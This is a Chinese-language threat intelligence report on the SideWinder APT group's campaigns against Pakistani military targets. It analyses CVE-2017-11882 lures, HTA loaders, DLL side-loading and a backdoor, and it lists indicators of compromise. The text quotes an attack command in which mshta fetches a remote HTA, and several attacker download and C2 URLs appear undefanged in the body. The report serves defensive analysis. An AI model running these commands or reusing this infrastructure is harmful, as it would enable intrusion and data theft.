<bdo id="2b3yk"><code id="2b3yk"></code></bdo>

  • <output id="2b3yk"><sup id="2b3yk"></sup></output>
    <output id="2b3yk"><ruby id="2b3yk"></ruby></output>
  • <code id="2b3yk"><delect id="2b3yk"></delect></code>

  • 響尾蛇(SideWinder)APT組織針對南亞國家的攻擊活動披露

    2019-02-27 753961人圍觀 ,發現 6 個不明物體 網絡安全

    一、概述

    從 2017 年底到 2019 年初,騰訊御見威脅情報中心發現一個疑似來自印度的 APT 攻擊組織持續針對巴基斯坦等南亞國家的軍事目標進行了定向攻擊。騰訊御見威脅情報中心對該組織的攻擊活動進行了長期的深入分析,從溯源結果來看,該組織的最早的攻擊活動可以追溯到 2012 年。

    從御見威脅情報中心的分析結果來判斷,該組織的背景跟卡巴斯基在 2018 年第一季度報告中提到的 SideWinder 組織非常的相似,雖然卡巴斯基并未發布任何該組織的技術細節和報告。我們繼續沿用卡巴斯基的命名,命名該組織為”響尾蛇”(SideWinder、T-APT-04)。

    騰訊御見威脅情報中心曾在 2018 年 5 月份發布了該組織的技術分析報告,而此后騰訊御見威脅情報中心又多次捕捉到了該組織的攻擊活動。并且從分析結果來看,該組織一直在更新他們的攻擊技術,以此來躲避安全軟件的攔截和查殺。 

    二、最新樣本技術分析

    1、攻擊誘餌分析

    本次攻擊誘餌采用 CVE-2017-11882 漏洞進行攻擊,打開后并無任何內容。

    觸發漏洞后,會從遠程地址http://cdn-do.net/includes/b7199e61/-1/7340/dfd9a1da/final獲取 hta,然后調用 RunHtmlApplication,將命令行中的 final.hta 執行:

    2、final.hta 分析

    final.hta 內容如下:

    hta 腳本中第一段 base64 字符串解碼后,發現一段 c# 代碼及一個 pe 文件存儲其中。將此 pe 文件 dump 出后,發現其名稱為 PreBotHta.dll:

    PreBotHta.dll 為一 c# 語言編寫的 dll 文件。Hta 腳本會調用 DynamicInvoke 執行 c# 代碼,最終執行 PreBotHta.dll 中類函數 work(類名為「preBotHta」)

    3、PreBotHta.dll 分析

    PreBotHta 類中的函數如下圖所示:

    Work 函數會檢查「360」、「avast」、」avg」等殺軟是否存在,若存在除上述名稱以外的殺毒軟件,就上報殺毒軟件的名稱到http://cdn-do.net/plugins/-1/7340/true/true/;接著會設置開機自啟動項「credw1「;最終會將 hta 中的另一段 base64 解碼解壓縮得到 Duser.dll,釋放路徑為「C:\ProgramData\drvr\srvc2」,并利用微軟自帶的程序 credwiz.exe,將 Duser.dll 給執行起來:

    4、Duser.dll 分析

    該 dll 所有導出函數都指向同一個地址 100025f0。木馬的核心功能也將從地址開始:

    主要功能是先利用 url http://www.microsoft.com測試網絡是否連通,接著下載一個 js 腳本并執行此腳本,下載地址為http://cdn-list.net/KOmJg2XSthl3PRhXnB6xT6Wo967B1n5uGf7SfiBC/-1/7340/b729d30c/css

    由于捕捉到樣本時,該服務器已經失效,因此無法繼續分析下載回的 js。

    三、攻擊技術特點

    騰訊御見威脅情報中心對 SideWinder 的攻擊活動進行了持續的跟蹤,對該組織的技術特點及變化整理如下:

    攻擊誘餌

    該組織的攻擊誘餌主要有以下兩類:office 文檔和 lnk。

    1、 lnk

    如某次攻擊中的誘餌文件如下:

    執行該 lnk 后,會執行命令:「%windir%\system32\mshta.exe https://msftupdate.srv-cdn.com/cdne/plds/zoxr4yr5KV.hta

    執行后,最終會使用 powershell 把真正的 pdf 給釋放到%temp%\amend-ins-visit-on-abroad-15-11-2017.pdf 然后打開,并且從https://msftupdate.srv-cdn.com/fin.hta下載并執行 hta 腳本。

    2、 office 文檔

    office 文檔是該組織最喜歡的攻擊誘餌,捕捉到的攻擊活動絕大部分都使用 office 文檔做為攻擊誘餌。并且都使用 CVE-2017-11882 漏洞來執行后續活動。如上述分析中的誘餌文件。也如某次攻擊的誘餌文檔:

    觸發漏洞后,會從http://www.nadra.gov.pk.d-dns.co/includes/686a0ea5/-1/1224/fa1b01fb/final.hta下載最終執行的 hta 腳本。

    木馬加載技術

    SideWinder 組織的惡意文件的加載技術主要是使用 hta 腳本和白加黑的方式來進行。其中 hta 腳本用來做一些初始化的操作,如釋放相應的惡意文件等;而釋放的惡意文件采用白加黑的方式來隱藏自身和躲避攔截和查殺。但是在持續跟蹤過程中,我們也發現該組織的一些技術細節也在不斷的進行進化,根據該變化我們把它分為三個階段:

    1、 階段一:~2018 年 10 月

    該階段主要使用 hta 腳本來完成所有下一階段的初始化的工作,而在 hta 腳本中使用 powershell 腳本來進行。

    如某次攻擊的 hta 腳本:

    腳本中」bnm「變量存儲的一段 base64 字符串為一 powershell 腳本,

    p1」、「p2」變量存儲的也是 base64 字符串,兩個字符串的內容會被存入 HKCU\Software\Updater\part1 和 HKCU\Software\Updater\part2 注冊表中,這兩個字符串其實就是后續的木馬文件 cmpbk32.dll 和 cmdla32.exe。

    bnm 變量解密出的 powershell 腳本內容如下所示:

    主要功能是將 system32 目錄下的 msvbvm60.dll 復制為 ATDMEX20.dll,將 system32 目錄下的 cmdl32.exe 復制到目錄「%programdata%\cmdl32\Updater\」, 將上文注冊表中的 HKCU\Software\Updater\part1 和 HKCU\Software\Updater\part2 兩部分解碼成 cmpbk32.dll 和 cmdla32.exe。最終白利用 cmdl32.exe 加載木馬文件 cmpbk32.dll,并設置注冊表項」Winsound「實現開機自啟動。

    2、 階段二:2018 年 10 月~2019 年 2 月

    該階段的加載過程依然在 hta 腳本中進行,但是 hta 腳本不再使用 powershell 來執行下一階段的初始化工作,直接在腳本中完成初始化的工作。如某次攻擊的腳本如下:

    腳本會將 base64 編碼的壓縮文件 Test.zip 解壓,Test.zip 中的文件主要有 FinalBot.exe、hj.txt、hj1.txt:

    接著會將 hj.txt 和 hj1.txt 中存儲的 cmpbk32.dll 釋放到 C:\ProgramData\Srvstr\dat 目錄:

    腳本會先獲取殺軟的名稱,如果不是「360」、「avast」,就上報殺軟的名稱到相應的服務器,如http://webserv-redir.net /plugins/ -1/5272/true/true/:

    最后會將系統自帶的「cmdl32.exe」復制到「C:\ProgramData\Srvstr\dat\」目錄,創建開機自啟動項「WinSrv」,并啟動 cmdl32.exe, 然后通知服務器執行成功, 最終 cmdl32.exe(白)程序會加載木馬文件 cmpbk32.dll:

    3、 階段三:2019 年 2 月~

    該階段的腳本類似于第二階段的腳本,但是把第二階段腳本中去下載回的 hta 腳本直接包含在了初始腳本中。但是也把第二階段的部分功能,如監測殺軟等功能放到了一個名為 PreBotHta 的 dll 中。如某次攻擊的腳本如下:

     腳本中的第一段 base64 解碼后為一段 c# 代碼以及一個 c# 編寫的 dll 文件,然后調用 DynamicInvoke 執行 c# 代碼:

    加載的 dll 為 PreBotHta.dll,該 dll 主要功能為監測安全軟件、設置啟動項、釋放和下載下一階段惡意文件:

    無論采用哪一階段的加載使用,最后都會使用白加黑的技術把最終的惡意文件給加載起來。

    如 cmdl32.exe+cmpbk32.dll 組合,其中 cmdl32.exe 為微軟自動下載連接管理的文件:

    如 credwiz.exe+Duser.dll 組合,其中 credwiz.exe 為備份或還原儲存的用戶名和密碼的文件:

    RAT

    最終釋放的惡意文件為一個 VB 寫的后門文件,用來收集用戶信息、記錄鍵盤和鼠標的操作等。具體的技術細節可以參考騰訊御見威脅情報中心之前關于該組織的分析報告:https://s.tencent.com/research/report/479.html

    此外,我們還在某一版本的后門中發現了一個用 c# 寫的信息收集模塊:PreBotModule.dll,

    該模塊的主要功能是收集信息并上傳至http://cdn-list.net/zqRwY5aPlgJu60xjqJIwnBPnwmqZhdNADQ50VpIy/-1/5272/1/cd24e373/res

    四、攻擊背景判斷

    1、 誘餌文件判斷:

    從該組織攻擊的誘餌文件來看,主要是跟巴基斯坦相關,如:

    而某個誘餌文件的作者信息為:

    而該作者的名字 Rashid Memorial 恰好跟巴基斯坦軍方相關:

    2、 從基礎設施來看,某次攻擊的 C&C 為

    http://www.google.com.d-dns.co/includes/686a0ea5/-1/1223/da897db0/final.hta

    根據御見安圖高級威脅追溯系統的查詢結果來看,跟 NADRA 相關:

    這也正好跟上面的某個誘餌文檔相符:

    該誘餌下載 hta 的地址為:

    http://www.nadra.gov.pk.d-dns.co/includes/686a0ea5/-1/1224/fa1b01fb/final.hta

    而 NADRA 為巴基斯坦內政部下屬的一個附屬部門國家數據庫和登記局成立了的國家數據庫組織。

    3、 VT 上傳信息:

    從 VT 的上傳信息來看,某些文件的上傳者來自于巴基斯坦:

    綜上我們判斷,該組織的攻擊對象跟巴基斯坦軍方等部門相關。

    五、組織小結

    六、總結

    響尾蛇(SideWinder)組織是一個成熟的 APT 攻擊組織,該組織擅長使用 office 漏洞、hta 腳本、白加黑、VB 木馬等技術來實施攻擊,并且攻擊手法還在不斷的進化中。目前該組織的攻擊目標主要在巴基斯坦,但是由于地緣關系,也不排除針對中國境內的目標發起攻擊,因此相關部門、單位和企業切不可掉以輕心。

    七、安全建議

    1、不要打開不明來源的郵件附件;除非非常清楚文檔來源可靠,否則建議不要啟用 Office 執行宏代碼;

    2、 及時打系統補丁和重要軟件的補丁;

    3、 使用殺毒軟件防御可能的病毒木馬攻擊;

    4、 使用騰訊御界高級威脅檢測系統,及時發現 APT 攻擊的蛛絲馬跡。御界高級威脅檢測系統,是基于騰訊安全反病毒實驗室的安全能力、依托騰訊在云和端的海量數據,研發出的獨特威脅情報和惡意檢測模型系統。

    八、附錄

    1、IOCs

    MD5

    d2522e45c0b0d83dddd3fcc51862d48c

    444438f4ce76156cec1788392f887da6

    3cd725172384297732222ef9c8f74adc

    c0f15436912d8a63dbb7150d95e6a4ee

    c986635c40764f10bcebe280b05efe8c

    d1c3fa000154dbccd6e5485a10550a29

    b956496c28306c906fddf08ded1cdf65

    a1ca53efda160b31ebf07d8553586264

    204860ce22c81c6d9de763c09e989a20

    de7f526d4f60b59bb1626770f329f984

    2cb633375a5965f86360e761363d9f2f

    5cd406e886bd9444adee4e8b62aa56cc

    358450e19d38db77c236f45881dcebef

    29325cdbde5e0cf60d277aa2d9ba4537

    836419a7a4675d51d006d4cb9102af9c

    URL

    hxxps://msftupdate.srv-cdn.com/cdne/plds/zoxr4yr5KV.hta

    hxxps://msftupdate.srv-cdn.com/fin.hta

    hxxp://www.google.com.d-dns.co/includes/686a0ea5/-1/1223/da897db0/final.hta

    hxxp://www.nadra.gov.pk.d-dns.co/includes/686a0ea5/-1/1224/fa1b01fb/final.hta

    hxxp://webserv-redir.net/includes/b7199e61/-1/5272/fdbfcfc1/final

    hxxp://pmo.cdn-load.net/cgi/5ed0655734/-1/1078/d70cc726/file.hta

    hxxp://fb-dn.net/disrt/fin.hta

    hxxp://cdn-edge.net/checkout.php

    hxxp://cdn-edge.net/cart.php

    hxxp://cdn-edge.net/amount.php

    hxxp://ap12.ms-update-server.net/checkout.php

    hxxp://ap12.ms-update-server.net/cart.php

    hxxp://ap12.ms-update-server.net/amount.php

    hxxp://s2.cdn-edge.net/checkout.php

    hxxp://s2.cdn-edge.net/cart.phpB

    hxxp://s2.cdn-edge.net/amount.php

    hxxp://webserv-redir.net/plugins/-1/5272/true/true/

    hxxp://webserv-redir.net/plugins/-1/5272/true/true/done

    hxxp://s12.cdn-apn.net/checkout.php

    hxxp://s12.cdn-apn.net/cart.php

    hxxp://s12.cdn-apn.net/amount.php

    hxxp://cdn-do.net/plugins/-1/7340/true/true/

    hxxp://cdn-list.net/KOmJg2XSthl3PRhXnB6xT6Wo967B1n5uGf7SfiBC/-1/7340/b729d30c/css

    2、參考資料

    1、 https://s.tencent.com/research/report/479.html

    2、 https://medium.com/@Sebdraven/apt-sidewinder-complicates-theirs-malwares-4e15683e7e26

    *本文作者:騰訊電腦管家,轉載請注明來自FreeBuf.COM

    發表評論

    已有 6 條評論

    取消
    Loading...
    css.php 宁夏卫视在线直播观看